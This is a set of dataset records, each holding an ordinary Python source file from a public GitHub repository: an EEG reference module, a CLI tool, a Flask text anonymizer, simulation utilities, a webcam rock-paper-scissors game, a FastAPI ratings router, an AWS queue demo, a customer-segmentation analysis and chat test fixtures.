registration_metadata(HasTraits):\n fm = Float\n channels = List(Str)\n\nclass average_reference_operator(Module):\n \"\"\" average reference operator \"\"\"\n\n label = 'Avg Ref Op'\n \n ### Input Ports\n ip_registration_values = InputPort( trait = Array(typecode=float, shape=(None,None)) )\n ip_registration_electrode_names = InputPort( trait = List(Str) )\n ip_lead_field = InputPort( trait = Array(typecode=float, shape=(None,None)) )\n ip_lead_field_electrode_names = InputPort( trait = List(Str) )\n \n ### Output Ports\n op_registration_values_avg = OutputPort( trait = Array(typecode=float, shape=(None,None)) )\n op_registration_metadata = OutputPort( trait = Any );\n op_lead_field_avg = OutputPort( trait = Array(typecode=Float, shape=(None,None))) \n\n def start_module(self):\n\n self.i_registration_values = None\n self.i_registration_electrode_names = None\n self.i_lead_field = None\n self.i_lead_field_electrode_names = None\n\n def execute(self):\n self.i_registration_values = self.ip_registration_values.data\n self.i_lead_field = self.ip_lead_field.data\n self.i_registration_electrode_names = self.ip_registration_electrode_names.data\n self.i_lead_field_electrode_names = self.ip_lead_field_electrode_names.data\n if (self.i_registration_values != None) \\\n and ( self.i_lead_field != None) \\\n and (self.i_registration_electrode_names != None) \\\n and (self.i_lead_field_electrode_names != None):\n self.process()\n\n def process(self):\n self.progress = 0\n i_registration_values = self.i_registration_values\n i_lead_field = self.i_lead_field\n i_registration_electrode_names = self.i_registration_electrode_names\n i_lead_field_electrode_names = self.i_lead_field_electrode_names\n\n i_reg_cols = i_registration_values.shape[1]\n i_lead_cols = i_lead_field.shape[1]\n o_registration_values_avg = array(())\n o_lead_field_avg = array(())\n o_registration_metadata = registration_metadata()\n \n row_counter = 0\n reg_row_counter = 0\n for reg_name in i_registration_electrode_names:\n lead_row_counter = 0\n for lead_name in i_lead_field_electrode_names:\n if reg_name == lead_name:\n o_registration_values_avg = resize(o_registration_values_avg, (row_counter+1, i_reg_cols))\n o_lead_field_avg = resize(o_lead_field_avg, (row_counter+1, i_lead_cols))\n o_registration_values_avg[row_counter] = i_registration_values[reg_row_counter]\n o_lead_field_avg[row_counter] = i_lead_field[lead_row_counter]\n o_registration_metadata.channels.append(reg_name)\n row_counter += 1\n lead_row_counter += 1\n reg_row_counter += 1\n\n\n o_registration_values_avg = \\\n o_registration_values_avg - o_registration_values_avg.mean(0)\n\n o_lead_field_avg = \\\n o_lead_field_avg - o_lead_field_avg.mean(0)\n\n\n self.op_registration_values_avg.data = o_registration_values_avg\n self.op_lead_field_avg.data = o_lead_field_avg\n self.progress = 100\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sherdim/mapero","sub_path":"src/mapero/builtin-modules/modules/InverseSolution/average_reference_operator.py","file_name":"average_reference_operator.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74403027047","text":"import logging\nimport sys\n\nfrom abc import ABC, abstractmethod\n\nfrom sys_line.systems.abstract import System\nfrom sys_line.tools.cli import parse_cli\nfrom sys_line.tools.format import FormatTree\nfrom sys_line.tools.json import json_pretty_string\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass SysLineApp(ABC):\n \"\"\" Abstract SysLine Application \"\"\"\n\n def __init__(self, args, options):\n self.args = args\n self.options = options\n\n if self.options.debug:\n level = logging.DEBUG\n else:\n level = logging.INFO\n\n logging.basicConfig(level=level)\n LOG.debug(\"command line arguments: %s\", self.args)\n LOG.debug(\"application options: %s\", self.options)\n\n self.system = System.create_instance(options)\n\n @abstractmethod\n def run(self):\n \"\"\" Main application action to be implemented by subclasses \"\"\"\n\n @staticmethod\n def create_instance(args):\n \"\"\"\n Creates a SysLine application depending on the command line arguments\n \"\"\"\n options = parse_cli(args)\n if options.all is not None:\n fmt = options.output_format\n\n if fmt == \"key_value\":\n return SysLineAllKeyValue(args, options)\n\n if fmt == \"json\":\n return SysLineAllJson(args, options)\n\n err_msg = f\"unknown output format: '{fmt}'\"\n return SysLineError(args, options, err_msg=err_msg, err_code=2)\n\n if options.format:\n return SysLineFormat(args, options)\n return SysLineError(args, options, err_code=2)\n\n\nclass SysLineAll(SysLineApp):\n \"\"\" SysLine application running in 'all' mode \"\"\"\n\n def __init__(self, args, options):\n super(SysLineAll, self).__init__(args, options)\n if not self.options.all:\n self.domains = self.system.SHORT_DOMAINS\n else:\n self.domains = options.all\n\n def run(self):\n self.do_print()\n return 0\n\n @abstractmethod\n def do_print(self):\n \"\"\" Abstract printing method to be implemented by subclasses \"\"\"\n\n\nclass SysLineAllKeyValue(SysLineAll):\n \"\"\"\n A subclass of the SysLine application to print all information in key-pair\n format\n \"\"\"\n\n def do_print(self):\n for domain in self.domains:\n for name, info in self.system.query(domain).all_info():\n print(f\"{domain}.{name}: {info}\")\n\n\nclass SysLineAllJson(SysLineAll):\n \"\"\"\n A subclass of the SysLine application to print all information in json\n format\n \"\"\"\n\n def do_print(self):\n print(json_pretty_string(System.to_json(self.system, self.domains)))\n\n\nclass SysLineFormat(SysLineApp):\n \"\"\"\n A subclass of the SysLine application to print the specified information\n in the user provided format\n \"\"\"\n\n def run(self):\n for fmt in self.options.format:\n print(FormatTree(self.system, fmt).build())\n return 0\n\n\nclass SysLineError(SysLineApp):\n \"\"\"\n A subclass of the SysLine application to return an error code and\n optionally print an error message\n \"\"\"\n\n def __init__(self, args, options, err_msg=\"\", err_code=0):\n super(SysLineError, self).__init__(args, options)\n self.err_msg = err_msg\n self.err_code = err_code\n\n def run(self):\n if self.err_msg:\n LOG.error(self.err_msg)\n return self.err_code\n\n\ndef main():\n \"\"\" Main method \"\"\"\n return SysLineApp.create_instance(sys.argv[1:]).run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"julian-heng/sys-line","sub_path":"sys_line/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39543695407","text":"import logging\nimport urllib.parse\nfrom io import BytesIO\n\nimport requests\nfrom flask import Flask, request, jsonify\nfrom loko_extensions.business.decorators import extract_value_args\nfrom loko_extensions.model.components import Component, save_extensions, Input, Arg\n\nfrom business.anonymizer import Extractor, Anonymizer\nimport fitz\n\nfrom doc.doc import anonymizer_doc\n\napp = Flask(\"anonymization\", static_url_path=\"/web\", static_folder=\"/frontend/dist\")\n\ncomp = Component(\"Anonymizer\", inputs=[Input(\"text\", service=\"anonymize\")], icon=\"RiFileLockLine\",\n args=[Arg(name=\"keep\",\n description=\"Don't anonymize these entity types. One of 'CARDINAL', 'DATE', 'EVENT', 'FAC', 'GPE', 'LANGUAGE', 'LAW', 'LOC', 'MONEY', 'NORP', 'ORDINAL', 'ORG', 'PER', 'PERCENT', 'PRODUCT', 'QUANTITY', 'TIME', 'WORK_OF_ART'. Comma separated\"),\n Arg(name=\"entities\", type=\"boolean\", description=\"Returns also extracted entities\")],\n description=anonymizer_doc)\n# extr_comp = Component(\"Ents\")\n# pdf = Component(\"pdf_reader\", inputs=[Input(\"file\", service=\"pdf/text\"), Input(\"url\", service=\"pdf/url\")])\n\nsave_extensions([comp])\n\nextractor = Extractor()\nanonymizer = Anonymizer()\n\n\n@app.route(\"/anonymize\", methods=[\"POST\"])\n@extract_value_args(request)\ndef anonymize(value, args):\n doc = extractor(value)\n keep = args.get(\"keep\")\n if keep:\n keep = [x.strip() for x in keep.split(\",\")]\n out = anonymizer(doc, keep)\n return_entities = args.get(\"entities\")\n if return_entities:\n ents = []\n tokens = [token.text for token in doc]\n\n for e in doc.ents:\n ents.append(dict(label=e.label_, text=e.text, start=e.start, end=e.end))\n\n return jsonify(dict(anonymized_text=\" \".join(out), entities=ents, tokens=tokens))\n return jsonify(\" \".join(out))\n\n@app.route(\"/pdf/url\", methods=[\"POST\"])\n@extract_value_args(request)\ndef pdf_url(value, args):\n value = urllib.parse.unquote(value)\n raw = requests.get(value).content\n buff = BytesIO()\n buff.write(raw)\n buff.seek(0)\n\n doc = fitz.open(\"pdf\", buff)\n text = []\n for page in doc:\n text.append(page.get_text().strip())\n return jsonify(\" \".join(text))\n\nif __name__ == \"__main__\":\n app.run(\"0.0.0.0\", 8080)\n","repo_name":"loko-ai/loko_anonymizer","sub_path":"services/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70404107370","text":"import glob\nimport os\nimport yaml\n\n#-------------------------------------------------------------------------------------------------#\n\ndef getSimulationData():\n\tinput_dir = 'inputfiles/'\n\tsimulationFile = '%ssimulation_starter.yml' %input_dir\n\twith open(simulationFile) as f:\n\t\tSimulationData = yaml.load(f)\n\n\t# adjust the path names with the input directory\n\tSimulationData['atomfile'] = '%s%s' %(input_dir, SimulationData['atomfile'])\n\tSimulationData['atomTypesFile'] = '%s%s' %(input_dir, SimulationData['atomTypesFile'])\n\tSimulationData['bondTypesFile'] = '%s%s' %(input_dir, SimulationData['bondTypesFile'])\n\tSimulationData['angleTypesFile'] = '%s%s' %(input_dir, SimulationData['angleTypesFile'])\n\tSimulationData['dihedralTypesFile'] = '%s%s' %(input_dir, SimulationData['dihedralTypesFile'])\n\tSimulationData['pairPotentialFile'] = '%s%s' %(input_dir, SimulationData['pairPotentialFile'])\n\n\t# create the output directory \n\tsim_dir = SimulationData['sim_dir']\n\tSimulationData['sim_dir'] = MakeDirectory(sim_dir)\n\n\treturn SimulationData\n\n# def GetFileTypes(filename):\n# \tatomTypesFile = glob.glob('inputfiles/*_atomTypes.txt')[0]\n# \t# atomTypesFile = '%s_atomTypes.txt' %filename[:-4]\n# \tbondTypesFile = '%s_bondTypes.txt' %filename[:-4]\n# \tangleTypesFile = '%s_angleTypes.txt' %filename[:-4]\n# \tdihedralTypesFile = '%s_dihedralTypes.txt' %filename[:-4]\n\n# \treturn (atomTypesFile, bondTypesFile,\\\n# \t\t\tangleTypesFile, dihedralTypesFile)\n\n# def MakeResultsDirectory():\n# \t# make nice path slug if spaces are given\n# \tdir_name = 'structure_data/'\n# \t# make the results directory if it dosent exit\n# \tif not os.path.exists(dir_name):\n# \t\tos.makedirs(dir_name)\n# \treturn dir_name\n\ndef MakeDirectory(sim_name):\n\t# make nice path slug if spaces are given\n\tslug_list = sim_name.strip().split()\n\tslug = ''\n\tfor item in slug_list:\n\t\tslug += '{}_'.format(item)\n\t# replace the last _ with /\n\tslug = slug[:-1]+'/'\n\n\t# make the top directory if it dosent exit\n\tif not os.path.exists(slug):\n\t\tos.makedirs(slug)\n\n\treturn slug","repo_name":"joeburg/phd-research","sub_path":"LAMMPS_simulation_starter/General_model_starter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1032528295","text":"import random\nimport time\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\n\nmodel = load_model('keras_model.h5')\ncap = cv2.VideoCapture(0)\ndata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\noptions = ['rock', 'paper', 'scissors']\n\nclass rps:\n def __init__(self, options, computer_wins = 0, user_wins = 0):\n self.options = options\n self.computer_wins = computer_wins\n self.user_wins = user_wins\n\n def get_prediction(self):\n\n start = time.time()\n\n while True: \n \n ret, frame = cap.read()\n resized_frame = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n image_np = np.array(resized_frame)\n normalized_image = (image_np.astype(np.float32) / 127.0) - 1 # Normalize the image\n data[0] = normalized_image\n prediction = model.predict(data)\n cv2.imshow('frame', frame)\n # Press q to close the window\n # print(prediction) \n self.user_choice = np.argmax(prediction[0])\n # print(user_choice) \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n end = time.time()\n countdown = end - start\n if countdown > 4:\n print(countdown)\n break\n \n\n\n return self.user_choice\n\n def get_computer_choice(self):\n self.computer_choice = random.choice(options)\n return self.computer_choice\n\n\n def get_winner(self):\n\n print('computer played {}'.format(self.computer_choice))\n\n\n if self.user_choice == 0 : \n print('You played rock')\n if self.computer_choice == 'rock':\n print('It is a tie!')\n elif self.computer_choice == 'scissors':\n print('You win this round!')\n self.user_wins = self.user_wins + 1 \n elif self.computer_choice == 'paper':\n print('You lose this round!')\n self.computer_wins = self.computer_wins + 1\n\n elif self.user_choice == 1 :\n print('You played paper')\n if self.computer_choice == 'rock':\n print('You win this round!')\n self.user_wins = self.user_wins + 1\n elif self.computer_choice == 'scissors':\n print('You lose this round!')\n self.computer_wins = self.computer_wins + 1\n elif self.computer_choice == 'paper':\n print('It is a tie!')\n\n elif self.user_choice == 2 :\n print('You played scissors')\n if self.computer_choice == 'paper':\n print('You win this round!')\n self.user_wins = self.user_wins + 1\n elif self.computer_choice == 'rock':\n print('You lose this round!')\n self.computer_wins = self.computer_wins + 1\n elif self.computer_choice == 'scissors':\n print('It is a tie!')\n\n elif self.user_choice == 3:\n print('Camera did not regconise input. Plesae try again!')\n\n return self.computer_wins, self.user_wins\n\n\ndef play(options):\n game = rps(options, computer_wins = 0, user_wins = 0)\n while True:\n if game.user_wins < 3 and game.computer_wins < 3:\n game.get_prediction()\n game.get_computer_choice()\n game.get_winner()\n print(game.computer_wins, game.user_wins)\n elif game.user_wins == 3:\n print('Contragulations, you won the game!')\n break\n elif game.computer_wins == 3:\n print('Sorry, you lost the game!')\n break\n\n\nplay(options)\ncap.release()\ncv2.destroyAllWindows() \n\n\n","repo_name":"leojohnson293/computer-vision-rock-paper-scissors","sub_path":"class_camera_rps.py","file_name":"class_camera_rps.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28784712225","text":"from typing import Optional, List, Annotated\nfrom fastapi import FastAPI, Path, Query, Depends, APIRouter, HTTPException\nfrom pydantic import BaseModel\nimport models\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter()\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\ndb_dependency = Annotated[Session, Depends(get_db)]\nclass RatingsBase(BaseModel):\n book_id: int\n user_name: str\n rating: int\n review_text: str\n\n@router.post(\"/ratings\")\nasync def add_new_rating(review: RatingsBase, db: db_dependency):\n if not(1 <= review.rating <= 5):\n raise HTTPException(status_code=400, detail='Invalid Rating')\n result = db.query(models.Ratings.user_name).all()\n for user in result:\n print(user)\n if review.user_name == user[0]:\n raise HTTPException(status_code=400, detail='User already submitted rating')\n try:\n db_rating = models.Ratings(book_id = review.book_id, user_name = review.user_name, \n rating = review.rating, review_text = review.review_text)\n db.add(db_rating)\n db.commit()\n db.refresh(db_rating)\n return {\"message\":\"Rating added successfully\"}\n except:\n raise HTTPException(status_code=404, detail='Invalid Book id')\n\n@router.get(\"/ratings/{book_id}\")\nasync def all_ratings_of_book_id(book_id:int, db: db_dependency):\n result = db.query(models.Ratings).filter(models.Ratings.book_id == book_id).all()\n if not result:\n raise HTTPException(status_code=404, detail='Book is not found!')\n return result\n","repo_name":"Parth132/online_bookstore_using-_FastAPI","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25896652794","text":"#!/usr/bin/env python\n\nimport boto\nfrom boto.sqs.message import Message\nimport time\nimport signal\nimport sys\nimport os\nimport logging\n\n\"\"\" Simple 'hello world' to connect to AWS services.\n - Connect to SQS\n - create a queue if it doesn't exist\n - send a message\n - receive a message\n - store the value in S3\n\"\"\"\n\nif \"DEBUG_LOGGING\" in os.environ:\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nelse:\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\nlogger = logging.getLogger('aws_demo')\n\n\ndef get_sqs_queue():\n \"\"\" Return an SQS Queue object, creating the queue if needed \"\"\"\n args = {}\n\n if \"SQS_SECURE\" in os.environ:\n args['is_secure'] = False if \\\n os.environ[\"SQS_SECURE\"] == \"False\" else True\n\n if \"SQS_PORT\" in os.environ:\n args['port'] = os.environ[\"SQS_PORT\"]\n\n region = os.environ.get('SQS_REGION', 'us-west-2')\n queue = os.environ.get('SQS_QUEUE_NAME')\n conn = boto.sqs.connect_to_region(region, **args)\n\n if queue not in [str(q.name) for q in conn.get_all_queues()]:\n conn.create_queue(queue)\n\n return conn.lookup(queue)\n\n\ndef get_s3_key(path=\"hello.txt\"):\n \"\"\" Return a key handle at the appropriate S3 bucket and path \"\"\"\n\n bucket = os.environ['S3_BUCKET_NAME']\n\n c = boto.connect_s3()\n try:\n b = c.get_bucket(bucket)\n except boto.exception.S3ResponseError:\n c.create_bucket(bucket)\n b = c.get_bucket(bucket)\n\n k = boto.s3.key.Key(b)\n k.key = path\n return k\n\n\ndef hello_aws_world(queue, key):\n\n logger.info(\"Sending message\")\n\n m = Message()\n m.set_body(\"Hello World!\")\n queue.write(m)\n\n logger.info(\"Receive the message\")\n\n res = queue.get_messages(1)\n rec_m = res.pop()\n rec_body = rec_m.get_body()\n queue.delete_message(rec_m)\n\n logger.info(\"Got message <{}>\".format(rec_body))\n\n key.set_contents_from_string(rec_body)\n\n logger.info(\"Storing contents into s3 at {}\".format(key.key))\n\n\ndef main():\n signal.signal(signal.SIGTERM, sigterm_handler)\n queue = get_sqs_queue()\n key = get_s3_key()\n\n while True:\n hello_aws_world(queue, key)\n time.sleep(2)\n\n\ndef sigterm_handler(signal, frame):\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbarratt/docker-compose-fake-aws","sub_path":"democontainer/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"13227366118","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 1 13:29:55 2021\r\n\r\n@author: sneha\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas_profiling\r\nimport scipy\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport datetime as dt\r\ndata = pd.read_csv('C:/Users/sneha/Desktop/masters/project/online retail/online_retail.csv',encoding = 'unicode_escape')\r\ndata.columns = ['Invoice', 'StockCode', 'Description', 'Quantity', 'InvoiceDate','Price','Customer ID','Country']\r\ndata.info()\r\ndata.head()\r\ndata.describe()\r\n\r\ndata.corr()\r\nsns.heatmap(data.corr())\r\ndata.shape\r\n\r\n\r\ndf = data.copy()\r\n#df.columns = ['Invoice', 'StockCode', 'Description', 'Quantity', 'InvoiceDate','Price','Customer_id','Country']\r\ndf.head()\r\n\r\n\r\ndata1 = data[['Country','Customer ID']].drop_duplicates()\r\n\r\ndata1.groupby(['Country'])['Customer ID'].aggregate('count').reset_index().sort_values('Customer ID', ascending = False)\r\n\r\ndf = data.query(\"Country == 'United Kingdom'\").reset_index(drop=True)\r\ndf.head()\r\ndf.info()\r\n#df.rename(columns = {0 :'InvoiceNo'}, inplace = True)\r\ndf.info()\r\n# data cleaning \r\ndf['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n\r\n# checking if missing values are present in the dataset\r\ndf.isnull().sum()\r\ndf.describe()\r\n\r\ndf = df[pd.notnull(df['Customer ID'])]\r\ndf.shape\r\n# removing outliers from the dataset\r\ndf = df[df.Quantity > 0]\r\n\r\nsns.boxplot(x=df[\"Quantity\"])\r\ndf = df[df.Quantity < 8000 ]\r\nsns.boxplot(x=df[\"Quantity\"])\r\ndf = df[df.Price < 8000 ]\r\nsns.boxplot(x=df[\"Price\"])\r\ndf.shape\r\n\r\n\r\n# calculating total price of the item \r\n\r\ndf['totalPrice'] = df['Quantity'] * df['Price']\r\n\r\n\r\n#Calculating the RFM values \r\n#Recency = Latest Date - Last Inovice Data, Frequency = count of invoice no. of transaction(s), Monetary = Sum of Total \r\n\r\nrecent = dt.datetime(2011,12,10)\r\n#Set Latest date 2011-12-10 as last invoice date was 2011-12-09. This is to calculate the number of days from recent purchase\r\n#Latest_Date = dt.datetime(2011,12,10)\r\n\r\nscore = df.groupby('Customer ID').agg({'InvoiceDate' : lambda x :(recent - x.max()).days,\r\n 'Invoice': lambda x: len(x),\r\n 'totalPrice' : lambda x:x.sum()})\r\n\r\n#Convert Invoice Date into type int\r\nscore['InvoiceDate'] = score['InvoiceDate'].astype(int)\r\n\r\nscore.rename(columns={'InvoiceDate': 'Recency', \r\n 'Invoice': 'Frequency', \r\n 'totalPrice': 'Monetary'}, inplace=True)\r\n\r\nscore.reset_index().head()\r\nscore.describe()\r\n\r\n# checking the distribution and skewness of RFM values\r\np = score['Recency']\r\nax = sns.displot(p)\r\np1 =score.query('Frequency <1000')['Frequency']\r\nax = sns.displot(p1)\r\np2 = score.query('Monetary < 10000')['Monetary']\r\nax = sns.displot(p2)\r\n\r\n#Splitting the segments\r\nq1 = score.quantile(q=[0.2, 0.4, 0.6, 0.8])\r\nq1 = q1.to_dict()\r\n\r\ndef r_score(x):\r\n if x <= q1['Recency'][0.2]:\r\n return 5\r\n elif x <= q1['Recency'][0.4]:\r\n return 4\r\n elif x <= q1['Recency'][0.6]:\r\n return 3\r\n elif x <= q1['Recency'][0.8]:\r\n return 2\r\n else:\r\n return 1\r\n\r\ndef fm_score(x, c):\r\n if x <= q1[c][0.2]:\r\n return 1\r\n elif x <= q1[c][0.4]:\r\n return 2\r\n elif x <= q1[c][0.6]:\r\n return 3\r\n elif x <= q1[c][0.8]:\r\n return 4\r\n else:\r\n return 5 \r\n \r\n \r\nscore['R'] = score['Recency'].apply(lambda x: r_score(x))\r\nscore['F'] = score['Frequency'].apply(lambda x: fm_score(x, 'Frequency'))\r\nscore['M'] = score['Monetary'].apply(lambda x: fm_score(x, 'Monetary'))\r\n\r\n#Calculate and Add RFMGroup value column showing combined concatenated score of RFM\r\nscore['RFM_Score'] = score.R.map(str) + score.F.map(str) + score.M.map(str)\r\n\r\n\r\nmap = {\r\n r'[1-2][1-2]': 'Hibernating',\r\n r'[1-2][3-4]': 'At Risk',\r\n r'[1-2]5': 'Can\\'t loose',\r\n r'3[1-2]': 'About to sleep',\r\n r'33': 'Need attention',\r\n r'[3-4][4-5]': 'loyal customers',\r\n r'41': 'Promising',\r\n r'51': 'New customers',\r\n r'[4-5][2-3]': 'Potential loyalists',\r\n r'5[4-5]': 'Champions'\r\n}\r\n\r\nscore['Loyalty_level'] = score['R'].map(str) + score['F'].map(str)\r\nscore['Loyalty_level'] = score['Loyalty_level'].replace(map, regex=True)\r\n\r\n\r\n# counting number of customers for each loyalty level\r\n\r\ncount = score['Loyalty_level'].value_counts().sort_values(ascending = True)\r\n\r\nfig, ax = plt.subplots()\r\n\r\nbars = ax.barh(range(len(count)),count,color='lightcoral')\r\nax.set_frame_on(False)\r\nax.tick_params(left=False,\r\n bottom=False,\r\n labelbottom=False)\r\nax.set_yticks(range(len(count)))\r\nax.set_yticklabels(count.index)\r\n\r\nfor i, bar in enumerate(bars):\r\n value = bar.get_width()\r\n \r\n ax.text(value,\r\n bar.get_y() + bar.get_height()/2,\r\n '{:,} ({:}%)'.format(int(value),\r\n int(value*100/count.sum())),\r\n va='center',\r\n ha='left'\r\n )\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# normalizing data before applying machine learning algorithm\r\n\r\n\r\ndef z(n):\r\n if n <= 0:\r\n return 1\r\n else:\r\n return n\r\n\r\nscore['Recency'] = [z(x) for x in score.Recency]\r\nscore['Monetary'] = [z(x) for x in score.Monetary]\r\nlog = score[['Recency','Frequency','Monetary']].apply(np.log,axis = 1).round(3)\r\n\r\n\r\n\r\nsc = StandardScaler()\r\nfinal_data = sc.fit_transform(log)\r\nfinal_data = pd.DataFrame(final_data, index = score.index, columns = log.columns)\r\n\r\n\r\n# # determinibg optimal k value using elbow method\r\nerr = {}\r\nfor i in range(1,20):\r\n model = KMeans(n_clusters= i, init= 'k-means++', max_iter= 1000)\r\n model.fit(final_data)\r\n err[i] = model.inertia_\r\n\r\n\r\nplt.figure(figsize=(12, 6))\r\nsns.pointplot(x = list(err.keys()), y = list(err.values()))\r\nplt.title('Finding optimal k value for clusters')\r\nplt.xlabel('K Value')\r\nplt.ylabel('Number of clusters')\r\n\r\nKm_model = KMeans(n_clusters= 3, init= 'k-means++', max_iter= 2000)\r\nKm_model.fit(final_data)\r\n#Find the clusters for the observation given in the dataset\r\nscore['Cluster'] = Km_model.labels_\r\nscore.head()\r\n\r\n\r\n\r\nplt.figure(figsize=(12,6))\r\n\r\n##Scatter Plot Frequency Vs Recency\r\nColors = [\"red\", \"green\", \"blue\"]\r\nscore['Color'] = score['Cluster'].map(lambda p: Colors[p])\r\nax = score.plot( \r\n kind=\"scatter\", \r\n x=\"Recency\", y=\"Frequency\",\r\n figsize=(10,8),\r\n c = score['Color']\r\n)\r\n\r\n\r\n# # Create a cluster label column in the original DataFrame\r\n# cluster_labels = Km_model.labels_\r\n# temp = score[['Recency','Frequency','Monetary']]\r\n# temp1 = final_data.assign(Cluster = cluster_labels)\r\n# temp2 = temp.assign(Cluster = cluster_labels)\r\n\r\n# # Calculate average RFM values and size for each cluster\r\n# summary_k4 = temp2.groupby(['Cluster']).agg({'Recency': 'mean',\r\n# 'Frequency': 'mean',\r\n# 'Monetary': ['mean', 'count'],}).round(0)\r\n\r\n\r\n# cluster_avg = temp2.groupby(['Cluster']).mean()\r\n# population_avg = temp.head().mean()\r\n# relative_imp = cluster_avg / population_avg - 1\r\n# relative_imp.round(2)\r\n\r\n\r\n\r\n# # Plot heatmap\r\n# plt.title('Relative importance of attributes')\r\n# sns.heatmap(data=relative_imp, annot=True, cmap='RdYlGn')\r\n# plt.show()\r\n\r\n\r\n\r\n# survival analysis for finding retention rate\r\n\r\n\r\n# cohert analysis\r\n\r\ndef month(value):\r\n return dt.datetime(value.year,value.month,1)\r\n\r\n# copying the data into another dataframe\r\ndf1 = df.copy()\r\n#applying funtion month to get first date on the month\r\ndf1['Invoice_Month'] = df1['InvoiceDate'].apply(month)\r\n# grouping all the customers by month\r\nt1 = df1.groupby('Customer ID')['Invoice_Month']\r\nt1.head()\r\n# getting month cohort months \r\ndf1['Cohort_Month'] = t1.transform('min')\r\ndf1[['Customer ID','InvoiceDate','Invoice_Month', 'Cohort_Month']].head()\r\n\r\n# defining a funtion to seperate invoice year and month\r\ndef parse_date(d):\r\n year = d.dt.year\r\n month = d.dt.month\r\n return year, month\r\n\r\n\r\nyear_i, month_i = parse_date(df1['InvoiceDate'])\r\n\r\nyear_c, month_c = parse_date(df1['Cohort_Month'])\r\n\r\n\r\n# Calculate differences\r\ndiff1 = year_i - year_c\r\ndiff2 = month_i - month_c\r\n\r\n# Calculating cohort index\r\ndf1['Cohort_Index'] = diff1 * 12 + diff2+ 1\r\n\r\n#df1[['Customer ID','InvoiceDate','Invoice_Month', 'Cohort_Month', 'Cohort_Index']].head()\r\ng = df1.groupby(['Cohort_Month', 'Cohort_Index'])\r\nsurv_data = g['Customer ID'].apply(pd.Series.nunique).reset_index()\r\n\r\nsurv_data.columns = ['Cohort_Month', 'Cohort_Index', 'Number of distinct Customers']\r\n\r\nretention_counts = surv_data.pivot(index='Cohort_Month', columns='Cohort_Index', \r\n values='Count of unique CustomerID')\r\n\r\n\r\ncohort_sizes = retention_counts.iloc[:,0]\r\n\r\n# calculating retentation rate\r\nrate = retention_counts.divide(cohort_sizes, axis=0)\r\n\r\nrate.round(3)*100\r\n\r\nrate.index = rate.index.strftime('%Y-%m')\r\n\r\n\r\nplt.figure(figsize=(25, 25))\r\n\r\n\r\nplt.title('Retention Rate', fontsize = 16)\r\nsns.heatmap(rate, annot=True,cmap='YlGnBu', vmin = 0.0 , vmax = 0.6)\r\nplt.ylabel('Cohort Month')\r\nplt.xlabel('Cohort Index')\r\nplt.yticks( rotation='360')\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"snehalbende/Customer_Segmentation","sub_path":"customer_segmentation.py","file_name":"customer_segmentation.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17991721959","text":"from datetime import datetime\n\nimport pytest\nfrom attr import asdict\nfrom chat.application.services import Chats, Users\n\n\n@pytest.fixture(scope='function')\ndef service_user(user_repo):\n return Users(user_repo=user_repo)\n\n\n@pytest.fixture(scope='function')\ndef service_chat(user_repo, chat_repo, chat_members_repo, chat_messages_repo):\n return Chats(user_repo=user_repo, chat_repo=chat_repo, chat_members_repo=chat_members_repo,\n chat_messages_repo=chat_messages_repo)\n\n\ndata_user = {\n\n 'login': 'user_login_1',\n 'password': 'user_password_1',\n 'user_name': 'user_name_1',\n 'id': 1,\n}\n\ndata_chat = {\n 'author_id': 1,\n 'chat_name': 'chat_1',\n 'description': 'desc_1',\n 'creation_date': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),\n 'id': 1\n}\n\ndata_chat_update = {\n 'author_id': 1,\n 'chat_name': 'chat_new',\n 'description': 'desc_new',\n 'creation_date': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),\n 'id': 1\n}\n\ndata_chat_user = {\n 'chat_id': 1,\n 'user_id': 1,\n 'author_id': 1,\n 'id': 1,\n}\n\ndata_chat_msg = {\n 'chat_id': 1,\n 'user_id': 1,\n 'text': 'my msg',\n 'id': 1,\n 'send_time': datetime.utcnow().strftime('%Y-%m-%d 